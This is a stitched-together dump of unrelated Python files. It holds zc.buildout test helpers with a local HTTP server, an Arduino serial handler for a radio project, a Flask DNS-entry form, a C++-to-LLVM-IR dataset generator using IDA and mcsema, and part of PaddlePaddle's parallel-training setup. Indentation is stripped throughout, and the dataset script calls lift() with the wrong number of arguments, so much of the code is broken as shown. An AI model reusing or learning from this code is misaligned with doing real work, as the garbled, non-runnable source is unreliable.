i, o, e = (p.stdin, p.stdout, p.stderr)
if input:
i.write(input.encode())
i.close()
result = o.read() + e.read()
o.close()
e.close()
output = result.decode()
if with_exit_code:
# Use the with_exit_code=True parameter when you want to test the exit
# code of the command you're running.
output += 'EXIT CODE: %s' % p.wait()
p.wait()
return output
def get(url):
return str(urlopen(url).read().decode())
def _runsetup(setup, *args):
if os.path.isdir(setup):
setup = os.path.join(setup, 'setup.py')
args = list(args)
args.insert(0, '-q')
here = os.getcwd()
try:
os.chdir(os.path.dirname(setup))
zc.buildout.easy_install.call_subprocess(
[sys.executable, setup] + args,
env=dict(os.environ,
PYTHONPATH=zc.buildout.easy_install.setuptools_pythonpath,
),
)
if os.path.exists('build'):
rmtree('build')
finally:
os.chdir(here)
def sdist(setup, dest):
_runsetup(setup, 'sdist', '-d', dest, '--formats=zip')
def bdist_egg(setup, executable, dest=None):
# Backward compat:
if dest is None:
dest = executable
else:
assert executable == sys.executable, (executable, sys.executable)
_runsetup(setup, 'bdist_egg', '-d', dest)
def wait_until(label, func, *args, **kw):
if 'timeout' in kw:
kw = dict(kw)
timeout = kw.pop('timeout')
else:
timeout = 30
deadline = time.time()+timeout
while time.time() < deadline:
if func(*args, **kw):
return
time.sleep(0.01)
raise ValueError('Timed out waiting for: '+label)
class TestOptions(zc.buildout.buildout.Options):
def __init__(self, *args):
zc.buildout.buildout.Options.__init__(self, *args)
self._created = []
def initialize(self):
pass
class Buildout(zc.buildout.buildout.Buildout):
def __init__(self):
for name in 'eggs', 'parts':
if not os.path.exists(name):
os.mkdir(name)
zc.buildout.buildout.Buildout.__init__(
self, '', [('buildout', 'directory', os.getcwd())], False)
Options = TestOptions
def buildoutSetUp(test):
test.globs['__tear_downs'] = __tear_downs = []
test.globs['register_teardown'] = register_teardown = __tear_downs.append
prefer_final = zc.buildout.easy_install.prefer_final()
register_teardown(
lambda: zc.buildout.easy_install.prefer_final(prefer_final)
)
here = os.getcwd()
register_teardown(lambda: os.chdir(here))
handlers_before_set_up = logging.getLogger().handlers[:]
def restore_root_logger_handlers():
root_logger = logging.getLogger()
for handler in root_logger.handlers[:]:
root_logger.removeHandler(handler)
for handler in handlers_before_set_up:
root_logger.addHandler(handler)
bo_logger = logging.getLogger('zc.buildout')
for handler in bo_logger.handlers[:]:
bo_logger.removeHandler(handler)
register_teardown(restore_root_logger_handlers)
base = tempfile.mkdtemp('buildoutSetUp')
base = os.path.realpath(base)
register_teardown(lambda base=base: rmtree(base))
old_home = os.environ.get('HOME')
os.environ['HOME'] = os.path.join(base, 'bbbBadHome')
def restore_home():
if old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = old_home
register_teardown(restore_home)
base = os.path.join(base, '_TEST_')
os.mkdir(base)
tmp = tempfile.mkdtemp('buildouttests')
register_teardown(lambda: rmtree(tmp))
zc.buildout.easy_install.default_index_url = 'file://'+tmp
os.environ['buildout-testing-index-url'] = (
zc.buildout.easy_install.default_index_url)
def tmpdir(name):
path = os.path.join(base, name)
mkdir(path)
return path
sample = tmpdir('sample-buildout')
os.chdir(sample)
# Create a basic buildout.cfg to avoid a warning from buildout:
with open('buildout.cfg', 'w') as f:
f.write("[buildout]\nparts =\n")
# Use the buildout bootstrap command to create a buildout
zc.buildout.buildout.Buildout(
'buildout.cfg',
[('buildout', 'log-level', 'WARNING'),
# trick bootstrap into putting the buildout develop egg
# in the eggs dir.
('buildout', 'develop-eggs-directory', 'eggs'),
]
).bootstrap([])
# Create the develop-eggs dir, which didn't get created the usual
# way due to the trick above:
os.mkdir('develop-eggs')
if os.getenv("COVERAGE_PROCESS_START"):
# The user has requested subprocess code coverage. Since we will be changing
# directories, we need to make sure this path is absolute, which means
# we need to temporarily return to our starting directory.
os.chdir(here)
path_to_coveragerc = os.path.abspath(os.environ['COVERAGE_PROCESS_START'])
os.chdir(sample)
assert os.path.isfile(path_to_coveragerc), path_to_coveragerc
os.environ['COVERAGE_PROCESS_START'] = path_to_coveragerc
# Before we return to the current directory and destroy the
# temporary working directory, we need to copy all the coverage files
# back so that they can be `coverage combine`d.
def copy_coverage_files():
coveragedir = os.path.dirname(path_to_coveragerc)
import glob
for f in glob.glob('.coverage*'):
shutil.copy(f, coveragedir)
__tear_downs.insert(0, copy_coverage_files)
# Now we must modify the newly created bin/buildout to
# actually begin coverage.
with open('bin/buildout') as f:
import textwrap
lines = f.read().splitlines()
assert lines[1] == '', lines
lines[1] = 'import coverage; coverage.process_startup()'
with open('bin/buildout', 'w') as f:
f.write('\n'.join(lines))
def start_server(path):
port, thread = _start_server(path, name=path)
url = 'http://localhost:%s/' % port
register_teardown(lambda: stop_server(url, thread))
return url
cdpaths = []
def cd(*path):
path = os.path.join(*path)
cdpaths.append(os.path.abspath(os.getcwd()))
os.chdir(path)
def uncd():
os.chdir(cdpaths.pop())
test.globs.update(dict(
sample_buildout = sample,
ls = ls,
cat = cat,
mkdir = mkdir,
rmdir = rmdir,
remove = remove,
tmpdir = tmpdir,
write = write,
system = system,
get = get,
cd = cd, uncd = uncd,
join = os.path.join,
sdist = sdist,
bdist_egg = bdist_egg,
start_server = start_server,
stop_server = stop_server,
buildout = os.path.join(sample, 'bin', 'buildout'),
wait_until = wait_until,
print_ = print_,
clean_up_pyc = clean_up_pyc,
))
zc.buildout.easy_install.prefer_final(prefer_final)
def buildoutTearDown(test):
for f in test.globs['__tear_downs']:
f()
class Server(HTTPServer):
def __init__(self, tree, *args):
HTTPServer.__init__(self, *args)
self.tree = os.path.abspath(tree)
__run = True
def serve_forever(self):
while self.__run:
self.handle_request()
def handle_error(self, *_):
self.__run = False
class Handler(BaseHTTPRequestHandler):
Server.__log = False
def __init__(self, request, address, server):
self.__server = server
self.tree = server.tree
BaseHTTPRequestHandler.__init__(self, request, address, server)
def do_GET(self):
if '__stop__' in self.path:
self.__server.server_close()
raise SystemExit
def k():
self.send_response(200)
out = '<html><body>k</body></html>\n'.encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
if self.path == '/enable_server_logging':
self.__server.__log = True
return k()
if self.path == '/disable_server_logging':
self.__server.__log = False
return k()
path = os.path.abspath(os.path.join(self.tree, *self.path.split('/')))
if not (
((path == self.tree) or path.startswith(self.tree+os.path.sep))
and
os.path.exists(path)
):
self.send_response(404, 'Not Found')
#self.send_response(200)
out = '<html><body>Not Found</body></html>'.encode()
#out = '\n'.join(self.tree, self.path, path)
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
return
self.send_response(200)
if os.path.isdir(path):
out = ['<html><body>\n']
names = sorted(os.listdir(path))
for name in names:
if os.path.isdir(os.path.join(path, name)):
name += '/'
out.append('<a href="%s">%s</a><br>\n' % (name, name))
out.append('</body></html>\n')
out = ''.join(out).encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
else:
with open(path, 'rb') as f:
out = f.read()
self.send_header('Content-Length', len(out))
if path.endswith('.egg'):
self.send_header('Content-Type', 'application/zip')
elif path.endswith('.gz'):
self.send_header('Content-Type', 'application/x-gzip')
elif path.endswith('.zip'):
                self.send_header('Content-Type', 'application/zip')
else:
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
def log_request(self, code):
if self.__server.__log:
print_('%s %s %s' % (self.command, code, self.path))
def _run(tree, port):
server_address = ('localhost', port)
httpd = Server(tree, server_address, Handler)
httpd.serve_forever()
httpd.server_close()
def get_port():
for i in range(10):
port = random.randrange(20000, 30000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
s.connect(('localhost', port))
except socket.error:
return port
finally:
s.close()
raise RuntimeError("Can't find port")
def _start_server(tree, name=''):
port = get_port()
thread = threading.Thread(target=_run, args=(tree, port), name=name)
thread.setDaemon(True)
thread.start()
wait(port, up=True)
return port, thread
def start_server(tree):
return _start_server(tree)[0]
def stop_server(url, thread=None):
try:
urlopen(url+'__stop__')
except Exception:
pass
if thread is not None:
thread.join() # wait for thread to stop
def wait(port, up):
addr = 'localhost', port
for i in range(120):
time.sleep(0.25)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.close()
if up:
break
except socket.error:
e = sys.exc_info()[1]
            if e.errno not in (errno.ECONNREFUSED, errno.ECONNRESET):
raise
s.close()
if not up:
break
else:
if up:
raise
else:
raise SystemError("Couldn't stop server")
def install(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
if dist.location.endswith('.egg'):
destination = os.path.join(destination,
os.path.basename(dist.location),
)
if os.path.isdir(dist.location):
shutil.copytree(dist.location, destination)
else:
shutil.copyfile(dist.location, destination)
else:
# copy link
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def install_develop(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'develop-eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def _normalize_path(match):
path = match.group(1)
if os.path.sep == '\\':
path = path.replace('\\\\', '/')
if path.startswith('\\'):
path = path[1:]
return '/' + path.replace(os.path.sep, '/')
normalize_path = (
re.compile(
r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)'''
% dict(sep=os.path.sep)),
_normalize_path,
)
normalize_endings = re.compile('\r\n'), '\n'
normalize_script = (
re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'),
'\\1- \\2\n')
if sys.version_info >= (3, ):
normalize___pycache__ = (
re.compile('(\n?)d __pycache__\n'), '\\1')
else:
normalize___pycache__ = (
re.compile(r'(\n?)- \S+\.pyc\n'), '\\1')
normalize_egg_py = (
re.compile(r'-py\d[.]\d(-\S+)?.egg'),
'-pyN.N.egg',
)
normalize_exception_type_for_python_2_and_3 = (
re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'),
    '\\2')
not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '')
# Setuptools now pulls in dependencies when installed.
adding_find_link = (re.compile(r"Adding find link '[^']+'"
r" from setuptools .*\r?\n"), '')
ignore_not_upgrading = (
re.compile(
'Not upgrading because not running a local buildout command.\n'
), '')
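# Sketch of how the (pattern, replacement) pairs above are typically applied
# when normalizing doctest output (zc.buildout wires them into a renormalizing
# output checker; this helper exists purely to illustrate the mechanism):
def _apply_normalizer(text, normalizer):
    pattern, replacement = normalizer
    return pattern.sub(replacement, text)
# e.g. _apply_normalizer('foo\r\nbar\r\n', normalize_endings) == 'foo\nbar\n'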
def run_buildout(command):
# Make sure we don't get .buildout
os.environ['HOME'] = os.path.join(os.getcwd(), 'home')
args = command.split()
import pkg_resources
buildout = pkg_resources.load_entry_point(
'zc.buildout', 'console_scripts', args[0])
buildout(args[1:])
def run_from_process(target, *args, **kw):
sys.stdout = sys.stderr = open('out', 'w')
target(*args, **kw)
def run_in_process(*args, **kwargs):
process = Process(target=run_from_process, args=args, kwargs=kwargs)
process.daemon = True
process.start()
process.join(99)
if process.is_alive() or process.exitcode:
with open('out') as f:
print(f.read())
def run_buildout_in_process(command='buildout'):
command = command.split(' ', 1)
command.insert(
1,
" use-dependency-links=false"
# Leaving this here so we can uncomment to see what's going on.
#" log-format=%(asctime)s____%(levelname)s_%(message)s -vvv"
" index=" + __file__ + 'nonexistent' # hide index
)
command = ' '.join(command)
run_in_process(run_buildout, command)
|
mySerial.py
|
import serial
import time
import threading
from myUtil import serialBaud, serialPort
from myUtil import MHz, kHz, minUkw, maxUkw, minKw, maxKw, minMw, maxMw, minLw, maxLw
from myUtil import minCap, maxCap
from myUtil import capToLw, capToMw, capToKw, capToUkw
from myLog import log, elog, slog
import myRadios
import myNoise
import statistics
currentDict = None
def getDict():
return currentDict
currentFreq = None
def getFreq():
return currentFreq
currentTuneFactor = None
def getTuneFactor():
return currentTuneFactor
currentRadio = None
serialObj = None
lastCaps = []
def parseSerial(line):
currentDict = {}
try:
line = line.decode("utf-8").strip()
segs = line.split("\t")
except UnicodeDecodeError as e:
        # this typically happens when the connection is opened in the middle of a message
elog(e.reason)
return currentDict
try:
for seg in segs:
[key, val] = seg.split(":")
key = key.strip()
val = val.strip()
if key == "Cap":
val = float(val)
else:
val = int(val)
currentDict[key] = val
except ValueError as e:
elog("ValueError: {}".format(line))
return currentDict
def capToFreq(currentDict):
cap = currentDict["Cap"]
if currentDict["LW"] == 1:
return capToLw(cap)
elif currentDict["MW"] == 1:
return capToMw(cap)
elif currentDict["KW"] == 1:
return capToKw(cap)
elif currentDict["UKW"] == 1:
return capToUkw(cap)
return 0
def thread_run():
global currentDict
global lastCaps
global currentFreq
global currentRadio
global currentTuneFactor
global serialObj
modeDebounce = 0
while True:
if not serialObj or not serialObj.is_open:
serialObj = serial.Serial()
serialObj.port = serialPort
serialObj.baudrate = serialBaud
try:
serialObj.open()
slog("Connected to Arduino on {}".format(serialPort))
except serial.SerialException as e:
elog(e)
time.sleep(2)
else:
try:
line = serialObj.readline()
currentDict = parseSerial(line)
# log(currentDict)
except serial.SerialException as e:
serialObj.close() # close so that Linux can use the same /dev/ttyUSB*
elog(e)
time.sleep(2)
if "On" in currentDict and "LW" in currentDict and "MW" in currentDict and "KW" in currentDict and "UKW" in currentDict and "Vol" in currentDict and "Tre" in currentDict and "Cap" in currentDict:
# if valid data
# check how many band selectors are active
mode = currentDict["LW"] + currentDict["MW"] + currentDict["KW"] + currentDict["UKW"]
if mode == 1:
# normal mode
maxTuneFactor = 0
# iron out spikes in cap values
lastCaps = lastCaps[0:4]
lastCaps.insert(0, currentDict["Cap"])
currentDict["Cap"] = statistics.median(lastCaps)
currentFreq = capToFreq(currentDict)
isOn = currentDict["On"] == 1
vol = currentDict["Vol"] * 100 / 255 if isOn else 0
staticVol = vol
for radio in myRadios.getRadios():
tuneFactor = radio.tuneFactor(currentFreq)
maxTuneFactor = max(maxTuneFactor, tuneFactor)
                    # Cross-over noise works as follows (see the standalone sketch at the end of this file):
if tuneFactor == 0:
# full noise. no signal
radio.off()
                        # staticVol stays at full volume (pure static)
else:
currentRadio = radio
if tuneFactor <= 0.5:
# full noise with a little bit of signal
myVol = tuneFactor * 2 * vol
                            # staticVol stays at full volume under the weak signal
elif tuneFactor < 1:
# full signal with a little bit of noise
myVol = vol
staticVol = (2 * (1 - tuneFactor)) * staticVol
else:
# full signal. no noise
myVol = vol
staticVol = 0
radio.setVolume(myVol)
myNoise.setVolume(staticVol)
currentTuneFactor = maxTuneFactor
elif mode == 0:
# if no channel is selected
# @TODO: maybe future use to calibrate the tuner or something
myNoise.setVolume(0)
if currentRadio != None:
currentRadio.off()
currentFreq = None
currentRadio = None
currentTuneFactor = None
if mode == 2:
                # two band buttons are pressed at the same time
modeDebounce += 1
if modeDebounce == 4 and currentRadio:
currentRadio.next()
else:
modeDebounce = 0
thread = threading.Thread(target=thread_run, daemon=True)
thread.name = "serial"
thread.start()
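# Standalone sketch of the cross-over noise mapping used in thread_run above,
# for a single tuned station (illustrative only; the real loop also switches
# the radio players on and off). tuneFactor is in [0, 1], vol in [0, 100];
# the function returns (signal volume, static volume).
def _crossfade(tuneFactor, vol):
    if tuneFactor == 0:
        return 0, vol                            # no signal, full static
    if tuneFactor <= 0.5:
        return tuneFactor * 2 * vol, vol         # weak signal over full static
    if tuneFactor < 1:
        return vol, 2 * (1 - tuneFactor) * vol   # full signal, fading static
    return vol, 0                                # full signal, no static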
|
web.py
|
#!/usr/bin/env python
import re
import worker
import logging
import config as CFG
import sqlite3 as sql
import multiprocessing
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def home():
if request.method == 'POST':
username = request.form['username']
domain = request.form['domain']
cname = request.form['cname']
for i, each in enumerate((username, domain, cname)):
if i == 0:
if not is_valid(each, 1):
return render_template('index.html', submit=True,
error=True)
else:
if not is_valid(each):
return render_template('index.html', submit=True,
error=True)
conn = sql.connect(CFG.DB)
c = conn.cursor()
c.execute('insert into yodns (username, domain, cname) values (?,?,?)',
(username, domain, cname))
conn.commit()
conn.close()
return render_template('index.html', submit=True, error=False)
return render_template('index.html')
def is_valid(value, usr_flag=None):
    regex = r'^\w+$' if usr_flag else r'^(\w+\.)?\w+\.\w+\.?$'
    if len(value) > 50:
        return False
    return re.search(regex, value)
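# Small self-contained sanity checks for is_valid (illustrative values only;
# nothing in the app calls this helper):
def _is_valid_examples():
    assert is_valid('alice', 1)            # usernames: a single \w+ token
    assert not is_valid('alice bob', 1)    # whitespace is rejected
    assert is_valid('sub.example.com')     # optional subdomain + domain + TLD
    assert not is_valid('x' * 51)          # anything longer than 50 chars fails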
if __name__ == '__main__':
p = multiprocessing.Process(target=worker.worker)
p.start()
logging.basicConfig(filename='logs/server.log',
format='%(asctime)s - %(levelname)s - %(message)s',
level=logging.DEBUG)
app.run(host='0.0.0.0', port=CFG.PORT, use_reloader=False)
|
gen_dataset.py
|
import re
import os
import argparse
import queue
import subprocess
import clang.cindex as cind
import multiprocessing as mp
from cxxfilt import demangle, InvalidName
from random import sample
from itertools import product
from tempfile import TemporaryDirectory
from threading import Thread
def prepare_cpp(f_txt_path, f_cpp_path):
includes = "#include <bits/stdc++.h>\nusing namespace std;\n"
re_main = re.compile(r"main\s*\(")
re_void = re.compile(r"void\s+int main")
re_int = re.compile(r"int\s+int main")
with open(f_txt_path) as f_txt:
content = f_txt.read()
content = re.sub(re_main, "int main(", content, count=1)
content = re.sub(re_int, "int main", content, count=1)
content = re.sub(re_void, "int main", content, count=1)
with open(f_cpp_path, "w") as f_cpp:
f_cpp.write(includes)
f_cpp.write(content)
return 0
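# Illustrative example (hypothetical snippet) of the rewrite prepare_cpp
# performs: a bare or void-declared main is normalized to "int main(" and the
# <bits/stdc++.h> prelude is prepended before the .cpp file is written.
_PREPARE_CPP_EXAMPLE_IN = "void main() { /* ... */ }"
_PREPARE_CPP_EXAMPLE_OUT = (
    "#include <bits/stdc++.h>\nusing namespace std;\n"
    "int main() { /* ... */ }"
)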
def compile(f_cpp_path, ir_per_file, compiler_flags):
compiler = ["g++", "clang++"]
olevel = ["-O0", "-O1", "-O2", "-O3", "-Os"]
fastmath = ["", "-ffast-math"]
native = ["", "-march=native"]
fpic = ["", "-fPIC"]
args = tuple(product(compiler, olevel, fastmath, native, fpic))
binaries = []
for i, additional_args in enumerate(sample(args, k=ir_per_file)):
f_bin_path = f"{f_cpp_path[:-4]}{i}"
if not subprocess.call(" ".join(additional_args) + f" {compiler_flags} {f_cpp_path} -o {f_bin_path}",
shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
binaries.append(f_bin_path)
return binaries
def lift(path_bin, path_ida, path_mcsema_lift, path_llvm_dis, mcsema_disas_timeout):
path_cfg, path_bc, path_ll = f"{path_bin}.cfg", f"{path_bin}.bc", f"{path_bin}.ll"
try:
ret_code = subprocess.call(f"wine {path_ida} -B -S\"{args['path_get_cfg']} --output {path_cfg} --arch amd64 "
f"--os linux --entrypoint main\" {path_bin}", shell=True,
timeout=mcsema_disas_timeout, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if any((ret_code, not os.path.exists(path_cfg), not os.stat(path_cfg).st_size)):
return
except subprocess.TimeoutExpired:
return
if subprocess.call(f"{path_mcsema_lift} --output {path_bc} --arch amd64 --os linux --cfg {path_cfg}", shell=True,
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
return
if subprocess.call(f"{path_llvm_dis} {path_bc} -o {path_ll}", shell=True):
return
return path_ll if os.path.exists(path_ll) and os.stat(path_ll).st_size else None
def get_func_names_from_cpp(path):
index = cind.Index.create()
func_types = [cind.CursorKind.FUNCTION_DECL, cind.CursorKind.CXX_METHOD, cind.CursorKind.FUNCTION_TEMPLATE]
struct_types = [cind.CursorKind.CLASS_DECL, cind.CursorKind.STRUCT_DECL, cind.CursorKind.CLASS_TEMPLATE]
try:
translation_units = index.parse(path, args=["-O0"])
except cind.TranslationUnitLoadError:
return
q = queue.Queue()
for node in translation_units.cursor.get_children():
if node.kind in struct_types or node.kind in func_types:
q.put(node)
func_nodes = []
while not q.empty():
cur = q.get()
if cur.kind in func_types:
# skip functions from includes
if os.path.abspath(cur.location.file.name) != os.path.abspath(path):
continue
func_nodes.append(cur)
elif cur.kind in struct_types:
for node in cur.get_children():
q.put(node)
return set([f.spelling for f in func_nodes])
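# Hedged illustration (the address and symbol are made up): mcsema tends to
# name lifted functions like `sub_401120__Z3fooi`; the re_func pattern below
# captures `_Z3fooi`, demangle() turns that into `foo(int)`, and only the part
# before '(' is compared against the names collected from the original .cpp.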
def store_funcs_from_ll(path_ll, funcs_from_cpp, path_dir, minlen):
re_func = re.compile(r"sub_[a-zA-Z0-9]+_(\w+)", re.ASCII)
with open(path_ll) as ll_file:
while True:
line = ll_file.readline()
if not line:
break
if line == "\n":
continue
tmp = line.split()
if tmp[0] != "define":
continue
else:
res_search = re.search(re_func, line)
if res_search:
try:
func_name = demangle(res_search.group(1)).split("(")[0]
except InvalidName:
continue
else:
continue
if func_name in funcs_from_cpp:
func_code = [line]
flen = 1
while True:
line = ll_file.readline()
func_code.append(line)
flen += 1
if line == "}\n":
break
if flen < minlen:
continue
with open(os.path.join(path_dir, f"{os.path.basename(path_ll[:-3])}_{func_name}.ll"),
"w") as f_func:
f_func.write("".join(func_code))
def process_class(q_in, args):
while not q_in.empty():
try:
cur_folder = q_in.get(timeout=1)
except queue.Empty:
break
c = int(os.path.basename(cur_folder))
print(f"Proccess {c} class")
for part in "train", "val", "test":
os.makedirs(os.path.join(os.path.join(args["path_out"], f"ir_{part}"), str(c)), exist_ok=True)
listing = [os.path.join(cur_folder, f) for f in os.listdir(cur_folder)]
num_success = 0
n1, n2, n3 = map(int, args["split_ratio"].split(":"))
s = n1 + n2 + n3
for f_txt_path in listing:
part = "train" if num_success % s < n1 else "val" if num_success % s < n1 + n2 else "test"
with TemporaryDirectory() as tempdir:
f_cpp_path = os.path.join(tempdir, f"{os.path.basename(f_txt_path)[:-4]}.cpp")
try:
prepare_cpp(f_txt_path, f_cpp_path)
except UnicodeDecodeError:
continue
funcs_from_cpp = get_func_names_from_cpp(f_cpp_path)
binaries = compile(f_cpp_path, args["ir_per_file"], args["compiler_flags"])
lifted = []
for bin in binaries:
                path_ll = lift(bin, args["path_ida"], args["path_get_cfg"], args["path_mcsema_lift"],
                               args["path_llvm_dis"], args["mcsema_disas_timeout"])
if path_ll:
lifted.append(path_ll)
for l in lifted:
store_funcs_from_ll(l, funcs_from_cpp, os.path.join(os.path.join(args["path_out"], f"ir_{part}"),
str(c)), args["llminlen"])
if lifted:
num_success += 1
if num_success == args["files_per_class"]:
break
def spawn_threads(q_in, args):
pool = [Thread(target=process_class, args=(q_in, args)) for _ in range(args["num_threads"])]
for t in pool:
t.start()
for t in pool:
t.join()
def main(args):
q_in = mp.Queue()
for f in [os.path.join(args["path_in"], str(c)) for c in range(1, args["num_classes"] + 1)]:
q_in.put(f)
pool = [mp.Process(target=spawn_threads, args=(q_in, args)) for _ in range(args["num_processes"])]
for p in pool:
p.start()
for p in pool:
p.join()
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--path-in", type=str, required=True)
parser.add_argument("--path-out", type=str, required=True)
parser.add_argument("--ir-per-file", type=int, default=8)
parser.add_argument("--files-per-class", type=int, default=400)
parser.add_argument("--compiler-flags", type=str, default="--no-warnings -std=c++11")
parser.add_argument("--path-ida", type=str, required=True, help="path to idat64.exe")
parser.add_argument("--path-get-cfg", type=str, required=True, help="path to get_cfg.py")
parser.add_argument("--path-llvm-dis", type=str, required=True)
parser.add_argument("--path-mcsema-lift", type=str, required=True)
parser.add_argument("--num-classes", type=int, default=104)
parser.add_argument("--num-threads", type=int, default=1)
parser.add_argument("--num-processes", type=int, default=1)
parser.add_argument("--mcsema-disas-timeout", type=int, default=120)
parser.add_argument("--split-ratio", type=str, default="13:3:4")
parser.add_argument("--llminlen", type=int, default=21)
args = parser.parse_args()
return vars(args)
if __name__ == "__main__":
args = parse_args()
main(args)
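# Hedged example invocation (every path below is a placeholder, not a value
# from the original project); the required arguments mirror parse_args():
#   python gen_dataset.py --path-in ./poj104_txt --path-out ./poj104_ir \
#       --path-ida /opt/ida/idat64.exe --path-get-cfg /opt/mcsema/get_cfg.py \
#       --path-mcsema-lift /usr/local/bin/mcsema-lift \
#       --path-llvm-dis /usr/bin/llvm-dis --num-processes 4 --num-threads 2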
|
parallel.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import warnings
from multiprocessing import Process, Manager
import time
import sys
from paddle import compat as cpt
# deprecated module import
from paddle.fluid import core
from paddle.fluid.framework import _set_expected_place
from paddle.fluid.dygraph import parallel_helper
from paddle.fluid.dygraph.parallel import ParallelEnv
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
__all__ = ["init_parallel_env"]
ParallelStrategy = core.ParallelStrategy
def _start_kv_server(port, http_server_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(int(port))
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_parallel_env():
"""
Initialize parallel training environment in dynamic graph mode.
.. note::
Now only supports initializing the GPU parallel training
environment and using NCCL for communication.
Returns:
None
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear1 = nn.Linear(10, 10)
self._linear2 = nn.Linear(10, 1)
def forward(self, x):
return self._linear2(self._linear1(x))
def train():
# 1. enable dynamic mode
paddle.disable_static()
# 2. initialize parallel environment
dist.init_parallel_env()
# 3. create data parallel layer & optimizer
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.MSELoss()
adam = opt.Adam(
learning_rate=0.001, parameters=dp_layer.parameters())
# 4. run layer
inputs = paddle.randn([10, 10], 'float32')
outputs = dp_layer(inputs)
labels = paddle.randn([10, 1], 'float32')
loss = loss_fn(outputs, labels)
loss = dp_layer.scale_loss(loss)
loss.backward()
dp_layer.apply_collective_grads()
adam.step()
adam.clear_grad()
if __name__ == '__main__':
dist.spawn(train)
"""
# 1. gpu check
if not core.is_compiled_with_cuda():
raise NotImplementedError(
"Cannot initialize parallel environment in CPU-only version, now only "
"supports initializing the GPU parallel environment. Please recompile "
"or reinstall paddle with GPU support.")
# 2. check env
def _check_var_exists(var_name):
var = os.environ.get(var_name, None)
if var is None:
raise ValueError("paddle.distributed initialize error, "
"environment variable %s is needed, but not set." %
var_name)
_check_var_exists("FLAGS_selected_gpus")
_check_var_exists("PADDLE_TRAINER_ID")
_check_var_exists("PADDLE_CURRENT_ENDPOINT")
_check_var_exists("PADDLE_TRAINERS_NUM")
_check_var_exists("PADDLE_TRAINER_ENDPOINTS")
if ParallelEnv().world_size < 2:
return
    # 3. init gloo context
ep_rank_0 = ParallelEnv().trainer_endpoints[0].split(":")
ep_rank = ParallelEnv().trainer_endpoints[ParallelEnv().rank].split(":")
manager = Manager()
    # global dict to store status
http_server_d = manager.dict()
http_server_d["running"] = False
if ParallelEnv().rank == 0:
http_server = Process(
target=_start_kv_server, args=(int(ep_rank_0[1]), http_server_d))
http_server.daemon = True
http_server_d["running"] = True
http_server.start()
wait_server_ready([ParallelEnv().trainer_endpoints[0]])
gloo_strategy = core.GlooParallelStrategy()
gloo_strategy.rank = ParallelEnv().rank
gloo_strategy.rank_num = ParallelEnv().world_size
gloo_strategy.ip_address = ep_rank_0[0]
gloo_strategy.ip_port = int(ep_rank_0[1])
default_init_timeout_seconds = 3600
default_run_timeout_seconds = 9999999
gloo_strategy.init_seconds = default_init_timeout_seconds
gloo_strategy.run_seconds = default_run_timeout_seconds
gloo = core.GlooParallelContext(gloo_strategy)
gloo.init()
if ParallelEnv().rank == 0:
http_server_d["running"] = False
http_server.join()
# 4. init NCCL ParallelStrategy
strategy = ParallelStrategy()
if parallel_helper._is_parallel_ctx_initialized():
warnings.warn("The parallel environment has been initialized.")
strategy.nranks = ParallelEnv().world_size
strategy.local_rank = ParallelEnv().rank
strategy.trainer_endpoints = ParallelEnv().trainer_endpoints
strategy.current_endpoint = ParallelEnv().current_endpoint
    # NOTE(chenweihang): [ why config global place here? ]
    # Dygraph mode will be the default mode, so users will not call
    # `dygraph.guard` or `enable_dygraph` directly. If they want to switch the
    # default place, they need to call a function to change it; here we just
    # set the correct place for them.
place = core.CUDAPlace(ParallelEnv().device_id)
_set_expected_place(place)
# init nccl context
parallel_helper._set_parallel_ctx(core.NCCLParallelContext(strategy, place))
parallel_helper._init_parallel_ctx()
def get_rank():
"""
Returns the rank of current trainer.
Its value is equal to the value of the environment variable ``PADDLE_TRAINER_ID`` .
The default value is 0.
Returns:
(int) The rank of current trainer.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINER_ID=0
print("The rank is %d" % dist.get_rank())
# The rank is 0
"""
return ParallelEnv().rank
def get_world_size():
"""
Returns the number of trainers (number of processes participating in current job).
